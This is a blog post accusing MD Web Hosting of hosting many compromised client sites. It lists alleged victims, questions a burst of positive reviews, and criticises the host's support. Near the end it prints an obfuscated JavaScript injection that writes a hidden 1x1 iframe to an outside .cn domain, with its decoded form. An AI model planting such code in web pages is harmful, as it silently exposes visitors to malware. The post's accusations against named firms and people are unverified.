Seems someone at MD Web Hosting is reading here and removed the offending code on instrumentsolutions.com.au or possibly Brad did it either way its been removed. So I did a little research on the actual server and found the following compromised websites. I wonder what the rate of compromised websites is on other Hosting companies is? Out of the 40 odd websites I checked (I did not check all websites) on MD Web Hosting server the following websites were found.  14 out of 40 or so must make you wonder. I am sure once they read this they willremove the offending code. There was three main infections that I found. Luckily archive.org and google have long memories soif they shout I am lying I have the proof to backit up.

• How do they allow so many sites to exist on their servers compromised?
• How did these sites get compromised in the first place?
• If you are considering MD Web Hosting as a HOST maybe ask for the IP first and do a check to see how many infected websites are on the same server.

I would suggest that unless you know what your doing you don’t visit these websites as your system could be infected with various malicious scripts and programs.

http://www.pfsgroup.com.au/

http://exactelectrical.com/

http://equinoxsolar.com.au/

http://fentez.com/

http://gold-corporate.com/

http://generia.com/

http://greenamenities.com/

http://ita.vic.edu.au/

http://nkinjectionmoulding.com/

http://mtcfvic.org/

http://naaschoice.com/

http://teamvisualvision.com/

http://vitalhealthgenics.com/ hacked not 1 but 2

http://www.annalisapansini.com/ several injections

Hmmm after a little bit more checking it looks like Brad and his website was the host of some rather curious pages I wonder if he even knew about them?

http://web.archive.org/web/*/instrumentsolutions.com.au/*

Check out the spammy pages. When I did a bit of a google search for those pages they were spammed out like crazy. Who ever got access to their site had posted spam on their site and then proceeded to gain 100’s of spammy links to those pages

Google Results

Going through the logs I see some unusual stuff so while I am checking that out I find that http://www.webhostingstuff.com/review/MDWebHosting.html has had a few updates to its Reviews now all these reviews are in a close nit of time 1 on the 3rd December 2008, 2 on the 4th December 2008, 1 on the 9th December 2008, and finally 1 on the 12th December (now this looks suss to me but who am I to argue) all these kind soles may have felt the need to put in positive reviews all at the same time. I don’t own the site and don’t have access to the ip logs so I am sure the owners of webhostingstuff looked into it and saw they were legit?

Anyways back to my story. The post on the 12th of December was from Brad (instrumentsolutions.com.au) now as far as I can tell (and I could be wrong) Brad is a Director, designer and technical support for the domain and business. He gives MD Web Hosting a glowing report 5 stars for Overall Rating, Uptime & Reliability, Technical Support and Customer Service. He must be very happy with MD Web Hosting.

Now you must be saying “SO WHAT” well the interesting thing is I wonder who injected malicious code into their domain was it

• someone hacked their site? are they using a sloppy script?
  
• brad put it in there for some reason? why would you?
  
• or did someone hack MD Web Hosting server and inject the code?

Now I am not sure who put it in there luckily the infection has been neutralised. I am sure from past interactions with MD that they will blame Brad for this problem.

The offending code has be obscufated

script type="text/javascript">!--
document.write(unescape('%3c%69%
66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%68%6f
%73%74%69%6e%67%6d%64%2e%63%6e%2f%73%2f%6f%75%74%2e%70%68%70
%3f%73%5f%69%64%3d%31%22%20%77%69%64%74%68%3d%31%20%68%65%69
%67%68%74%3d%31%20%73%74%79%6c%65%3d%22%76%69%73%69%62%69%6c
%69%74%79%3a%20%68%69%64%64%65%6e%22%3e%3c%2f%69%66%72%61%6d
%65%3e'))
// -->


Which in turns produces this iframe

script type="text/javascript">!--
document.write(unescape('iframe src="
http://hostingmd.cn/s/out.php?s_id=1" mce_src="
http://hostingmd.cn/s/out.php?s_id=1"
width=1 height=1 style="visibility: hidden" mce_style="visibility: hidden">
/iframe>'))
// -->


I wonder should I send an email is it worth it?

I was reading Whirlpool again (A great source of embarresment for MD Web Hosting) and one of their clients who said he was from Hong Kong said he couldn’t contact them, as they had lost their phone numbers. (Knowing how well they treat their online help) he put a message up on Whirlpool asking for help in contacting them.Much to my surprise MD Web Hosting’s representative tomn on whirlpool asked him to whim him in a fairly quick time. Another  user decided to give him some phone numbers (which had been disconnected) tomn’s reply was that those numbers no longer belonged to MD Web Hosting and that the only number to use was their 1300 number. Now not sure if tomn  knows this but 1300 numbers are only accesible inside Australia and seeing the guy was from Hong Kong then thats a problem. With all luck he is their only customer from outside Australia and will be the only person affected by this but my guess from the searches people are landing on this site about contact numbers for MD Web Hosting he is not the only person that can’t get in touch. Here is the thread in mention.